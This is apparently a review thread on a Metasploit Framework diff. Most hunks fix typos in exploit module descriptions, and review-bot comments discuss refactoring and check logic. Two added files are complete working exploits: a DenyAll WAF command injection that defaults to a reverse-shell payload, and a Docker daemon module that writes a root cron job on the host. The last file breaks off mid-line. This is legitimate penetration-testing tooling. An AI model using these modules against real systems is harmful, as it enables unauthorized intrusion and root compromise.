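Review bot: The `if flowcontrol` branch repeats the candump/cansend/counter/join sequence of the `else` branch line for line, so the two copies will drift apart on the next fix; lifting that sequence into a helper leaves isotp_send_and_wait with one send path and the flow-control continuation layered on top of it. The inner `if result["Packets"][0]["DATA"][0] == "10"` check appears to rely on the sniffer storing DATA as an array of two-character byte strings; a one-line comment saying so would help the next reader. The method starts and ends outside this hunk.
```ruby
  # Send one CAN frame on bus and wait for the sniffer started by candump to return.
  # Returns the sniffed response hash, or `result` unchanged when nothing was captured.
  def cansend_and_collect(bus, srcid, dstid, frame, timeout, maxpkts, result)
    candump(bus, dstid, timeout, maxpkts)
    system("cansend #{bus} #{srcid}##{frame}")
    @packets_sent += 1
    @last_sent = Time.now.to_i
    result["Success"] = true if $?.success?
    result["Packets"] = []
    $candump_sniffer.join
    @pkt_response.empty? ? result : @pkt_response
  end

  # … inside isotp_send_and_wait, replacing both branches of `if flowcontrol` …
      @can_interfaces.each do |can|
        next unless can == bus
        result = cansend_and_collect(bus, srcid, dstid, bytes, timeout, flowcontrol ? 1 : maxpkts, result)
        next unless flowcontrol
        # … unchanged: first-frame ("10") check, flow-control frame, second candump, merge of Packets …
      end
```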
@@ -252,11 +295,12 @@ class MetasploitModule < Msf::Auxiliary elsif request.uri =~ /automotive\/(\w+)\/isotpsend_and_wait\?srcid=(\w+)&dstid=(\w+)&data=(\w+)/ bus = $1; srcid = $2; dstid = $3; data = $4 print_status("Request to send ISO-TP packet and wait for response #{srcid}##{data} => #{dstid}") if datastore['VERBOSE'] - timeout = 1500 - maxpkts = 3 - timeout = $1 if request.uri =~ /&timeout=(\d+)/ - maxpkts = $1 if request.uri =~ /&maxpkts=(\d+)/ - send_response_html(cli, isotp_send_and_wait(bus, srcid, dstid, data, timeout, maxpkts).to_json(), { 'Content-Type' => 'application/json' }) + opt = {} + opt['TIMEOUT'] = $1 if request.uri =~ /&timeout=(\d+)/ + opt['MAXPKTS'] = $1 if request.uri =~ /&maxpkts=(\d+)/ + opt['PADDING'] = $1 if request.uri =~ /&padding=(\d+)/ + opt['FC'] = true if request.uri =~ /&fc=true/i + send_response_html(cli, isotp_send_and_wait(bus, srcid, dstid, data, opt).to_json(), { 'Content-Type' => 'application/json' }) else send_response_html(cli, not_supported().to_json(), { 'Content-Type' => 'application/json' }) end diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 482d2d38f5..9374bf196a 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module can be used to determine differences in the cache entries between two DNS servers. This is primarily useful for detecting cache poisoning attacks, - but can also be used to detect geo-location loadbalancing. + but can also be used to detect geo-location load balancing. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index 7f43c01027..8fc8199c4f 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb 
+++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and 10g up to 10.1.0.4. diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index caf95194d4..ffee9bcb8e 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2. diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 327c3b38aa..68b4d03eaa 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb 
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function. }, 'Author' => [ 'MC' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index 6c7f02745a..f1bd69bee4 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_XML package/function. }, 'Author' => [ 'MC' ], diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index 144999861c..54b8b8f357 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger', 'Description' => %q{ - This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in + This module will escalate an Oracle DB user to MDSYS by exploiting a sql injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege given to MDSYS user by creating evil trigger in system scheme (2-stage attack). }, 
diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index c085d9a1e4..1e00a3cacb 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -10,8 +10,8 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting - an sql injection bug in the SYS.LT.FINDRICSET package via Evil + This module will escalate an Oracle DB user to DBA by exploiting + a sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007. diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 1b5669ecb5..3b83207162 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE', 'Description' => %q{ - This module exploits an sql injection flaw in the MERGEWORKSPACE + This module exploits a sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. }, diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index 2b54b73c1b..1cb05aac04 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb 
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE', 'Description' => %q{ - This module exploits an sql injection flaw in the REMOVEWORKSPACE + This module exploits a sql injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. }, diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index bf3d96fd12..4d1f238c7e 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE', 'Description' => %q{ - This module exploits an sql injection flaw in the ROLLBACKWORKSPACE + This module exploits a sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability. }, diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index 1dc0c2fdea..90b9ba751c 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM), before version 10, doesn't implement access control properly, which allows remote attackers to modify user information. This module exploits the vulnerability to make - unauthorized speeddial entity manipulations. + unauthorized speed dial entity manipulations. }, 'Author' => 'fozavci', 'References' => 
diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index c993bb5bba..c5b2dc6fb2 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'SIP Deregister Extension', 'Description' => %q{ - This module will will attempt to deregister a SIP user from the provider. It + This module will attempt to deregister a SIP user from the provider. It has been tested successfully when the sip provider/server doesn't use REGISTER authentication. }, diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index 3bb28364da..8d48b0cc25 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -21,9 +21,9 @@ class MetasploitModule < Msf::Encoder 'Name' => 'printf(1) via PHP magic_quotes Utility Command Encoder', 'Description' => %q{ This encoder uses the printf(1) utility to avoid restricted - characters. Some shell variable substituion may also be used + characters. Some shell variable substitution may also be used if needed symbols are blacklisted. Some characters are intentionally - left unescaped since it is assummed that PHP with magic_quotes_gpc + left unescaped since it is assumed that PHP with magic_quotes_gpc enabled will escape them during request handling. }, 'Author' => 'jduck', diff --git a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb index 7045d3b026..7a2b69561e 100644 --- a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb +++ b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Android Stagefright MP4 tx3g Integer Overflow", 'Description' => %q{ - This module exploits a integer overflow vulnerability in the Stagefright + This module exploits an integer overflow vulnerability in the Stagefright Library (libstagefright.so). The vulnerability occurs when parsing specially crafted MP4 files. While a wide variety of remote attack vectors exist, this particular exploit is designed to work within an HTML5 compliant browser. diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index 83a00695d6..2acd014f5e 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit", 'Description' => %q{ This module exploits a bug in futex_requeue in the Linux kernel, using - similiar techniques employed by the towelroot exploit. Any Android device + similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index 30ddbf3b93..ed10140677 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow', 'Description' => %q{ This exploit connects to a system's modem over dialup and exploits - a buffer overlflow vulnerability in it's System V derived /bin/login. + a buffer overflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. }, 'References' => 
diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 0cbec9629b..e3d76631bf 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', 'Description' => %q{ This module exploits a vulnerability in Adobe Flash Player for Linux, - version 10.0.12.36 and 9.0.151.0 and prior. + version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index c829147f7a..2c71ce0a55 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote Although SSP significantly reduces the probability of a single attempt succeeding, it will not prevent exploitation. Since the daemon forks in a default configuration, the cookie value will remain the same despite - some attemtps failing. By making repeated requests, an attacker can eventually + some attempts failing. By making repeated requests, an attacker can eventually guess the cookie value and exploit the vulnerability. The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index f4e3b707e5..04dfbc66a9 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI - script, acessible through the Boa web server on Advantech switches. This module + script, accessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98. }, 'Author' => 'hdm', diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 39f37163e2..fbd10a7dbe 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker - to execute arbitrary commands by specifing shell metacharaters as the + to execute arbitrary commands by specifying shell metacharaters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response. diff --git a/modules/exploits/linux/http/alienvault_exec.rb b/modules/exploits/linux/http/alienvault_exec.rb index edbc29e014..14ca6b3ad3 100644 --- a/modules/exploits/linux/http/alienvault_exec.rb +++ b/modules/exploits/linux/http/alienvault_exec.rb 
@@ -13,13 +13,13 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "AlienVault OSSIM/USM Remote Code Execution", 'Description' => %q{ - This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together. + This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together. Unauthenticated users can execute arbitrary commands under the context of the root user. By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue action and policy that enables to execute operating system commands by using captured session token. As a final step, - SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes + SSH login attempt with an invalid credentials can trigger a created rogue policy which triggers an action that executes operating system command with root user privileges. This module was tested against following product and versions: diff --git a/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb b/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb index cfcb36cfd7..37ffe7aa13 100644 --- a/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb +++ b/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb 
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is used by the application without input validation and parameter binding, which leads to SQL injection - vulnerability. Successfully exploitating this vulnerability gives a the valid session. + vulnerability. Successfully exploiting this vulnerability gives a valid session. CryptoLog's logshares_ajax.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session. One user parameter is used by the diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index 6b3c3893bd..c5ac9de55b 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote in the '/etc/cron.d/' path of the host server. *Notes: The docker image must be a valid docker image from - hub.docker.com. Further more the docker container will only + hub.docker.com. Furthermore the docker container will only deploy if there are resources available in the DC/OS cluster. }, 'Author' => 'Erik Daguerre', diff --git a/modules/exploits/linux/http/denyall_waf_exec.rb b/modules/exploits/linux/http/denyall_waf_exec.rb new file mode 100644 index 0000000000..469144d3d6 --- /dev/null +++ b/modules/exploits/linux/http/denyall_waf_exec.rb 
@@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "DenyAll Web Application Firewall Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a + terminal command under the context of the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 3001, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Sep 19 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']) + ] + ) + end + + def get_token + # Taking token by exploiting bug on first endpoint. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'), + 'vars_get' => { + 'applianceUid' => 'LOCALUID', + 'typeOf' => 'debug' + } + }) + + if res && res.code == 200 && res.body.include?("iToken") + res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0] + else + nil + end + end + + def check + # If we've managed to get token, that means target is most likely vulnerable. + token = get_token + if token.nil? 
+ Exploit::CheckCode::Safe + else + Exploit::CheckCode::Appears + end + end + + def exploit + # Get iToken from unauthenticated accessible endpoint + print_status('Extracting iToken value') + token = get_token + + if token.nil? + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Awesome. iToken value = #{token}") + end + + # Accessing to the vulnerable second endpoint where we have command injection with valid iToken + print_status('Trigerring command injection vulnerability with iToken value.') + r = rand_text_alpha(5 + rand(3)); + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'), + 'vars_post' => { + 'iToken' => token, + 'tag' => 'tunnel', + 'stime' => r, + 'type' => "#{r}$(python -c \"#{payload.encoded}\")" + } + }) + + end +end diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index cd43f8d322..03b36f94d8 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'D-Link authentication.cgi Buffer Overflow', 'Description' => %q{ - This module exploits an remote buffer overflow vulnerability on several D-Link routers. + This module exploits a remote buffer overflow vulnerability on several D-Link routers. The vulnerability exists in the handling of HTTP queries to the authentication.cgi with long password values. The vulnerability can be exploitable without authentication. This module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 3d11d81d46..f52e9b9ded 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb 
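Review bot: `check` maps every nil from `get_token` to `Exploit::CheckCode::Safe`, but `get_token` also returns nil when `send_request_cgi` yields no response at all (`res` nil), so an unreachable or non-answering host is reported as not vulnerable instead of undetermined. The simplest fix is to issue the request inside `check` and return `Exploit::CheckCode::Unknown unless res` before delegating the token extraction to a small helper that both `check` and `exploit` share; the remaining `if token.nil? ... else ... end` then collapses to `token ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe`. Two smaller things in `exploit`: `print_status('Trigerring command injection vulnerability with iToken value.')` misspells "Triggering" in a commit that fixes typos elsewhere, and `r = rand_text_alpha(5 + rand(3));` carries a stray trailing semicolon.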
+++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'D-Link info.cgi POST Request Buffer Overflow', 'Description' => %q{ This module exploits an anonymous remote code execution vulnerability on different D-Link - devices. The vulnerability is an stack based buffer overflow in the my_cgi.cgi component, + devices. The vulnerability is a stack based buffer overflow in the my_cgi.cgi component, when handling specially crafted POST HTTP requests addresses to the /common/info.cgi handler. This module has been successfully tested on D-Link DSP-W215 in an emulated environment. diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index bb7dbfdea1..d405e08279 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'D-Link HNAP Request Remote Buffer Overflow', 'Description' => %q{ This module exploits an anonymous remote code execution vulnerability on different - D-Link devices. The vulnerability is due to an stack based buffer overflow while + D-Link devices. The vulnerability is due to a stack based buffer overflow while handling malicious HTTP POST requests addressed to the HNAP handler. This module has been successfully tested on D-Link DIR-505 in an emulated environment. }, diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb new file mode 100644 index 0000000000..c733b2440c --- /dev/null +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb 
@@ -0,0 +1,207 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit', + 'Description' => %q{ + Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp + with tls but without tls-auth), an attacker can create a Docker + container with the '/' path mounted with read/write permissions on the + host server that is running the Docker container. As the Docker + container executes command as uid 0 it is honored by the host operating + system allowing the attacker to edit/create files owned by root. This + exploit abuses this to creates a cron job in the '/etc/cron.d/' path of + the host server. + + The Docker image should exist on the target system or be a valid image + from hub.docker.com. 
+ }, + 'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'], + ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket'] + ], + 'DisclosureDate' => 'Jul 25, 2017', + 'Targets' => [ + [ 'Python', { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse noconn none tunnel' + } + } + }] + ], + 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(2375), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('CONTAINER_ID', [ false, 'container id you would like']) + ] + ) + end + + def check_image(image_id) + vprint_status("Check if images exist on the target host") + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('images', 'json') + ) + return unless res and res.code == 200 and res.body.include? image_id + + res + end + + def pull_image(image_id) + print_status("Trying to pulling image from docker registry, this may take a while") + res = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + ) + return unless res.code == 200 + + res + end + + def make_container_id + return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? 
+ + rand_text_alpha_lower(8) + end + + def make_cmd(mnt_path, cron_path, payload_path) + vprint_status('Creating the docker container command') + echo_cron_path = mnt_path + cron_path + echo_payload_path = mnt_path + payload_path + + cron_command = "python #{payload_path}" + payload_data = payload.raw + + command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " + command << "echo \"\" >> #{echo_cron_path} && " + command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" + + command + end + + def make_container(mnt_path, cron_path, payload_path) + vprint_status('Setting container json request variables') + { + 'Image' => datastore['DOCKERIMAGE'], + 'Cmd' => make_cmd(mnt_path, cron_path, payload_path), + 'Entrypoint' => %w[/bin/sh -c], + 'HostConfig' => { + 'Binds' => [ + '/:' + mnt_path + ] + } + } + end + + def del_container(container_id) + send_request_raw( + { + 'method' => 'DELETE', + 'uri' => normalize_uri('containers', container_id) + }, + 1 # timeout + ) + end + + def check + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('containers', 'json'), + 'headers' => { 'Accept' => 'application/json' } + ) + + if res.nil? + print_error('Failed to connect to the target') + return Exploit::CheckCode::Unknown + end + + if res and res.code == 200 and res.headers['Server'].include? 'Docker' + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def exploit + # check if target is vulnerable + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::Unknown, 'Failed to connect to the target') + end + + # check if image is not available, pull it or fail out + image_id = datastore['DOCKERIMAGE'] + if check_image(image_id).nil? + fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil? 
+ end + + # create required information to create json container information. + cron_path = '/etc/cron.d/' + rand_text_alpha(8) + payload_path = '/tmp/' + rand_text_alpha(8) + mnt_path = '/mnt/' + rand_text_alpha(8) + container_id = make_container_id + + # create container + res_create = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', 'create?name=' + container_id), + 'headers' => { 'Content-Type' => 'application/json' }, + 'data' => make_container(mnt_path, cron_path, payload_path).to_json + ) + fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 + + print_status("The docker container is created, waiting for deploy") + register_files_for_cleanup(cron_path, payload_path) + + # start container + send_request_raw( + { + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'start') + }, + 1 # timeout + ) + + # wait until container stopped + vprint_status("Waiting until the docker container stopped") + res_wait = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'wait'), + 'headers' => { 'Accept' => 'application/json' } + ) + + # delete container + deleted_container = false + if res_wait.code == 200 + vprint_status("The docker container has been stopped, now trying to remove it") + del_container(container_id) + deleted_container = true + end + + # if container does not deploy, remove it and fail out + unless deleted_container + del_container(container_id) + fail_with(Failure::Unknown, "The docker container 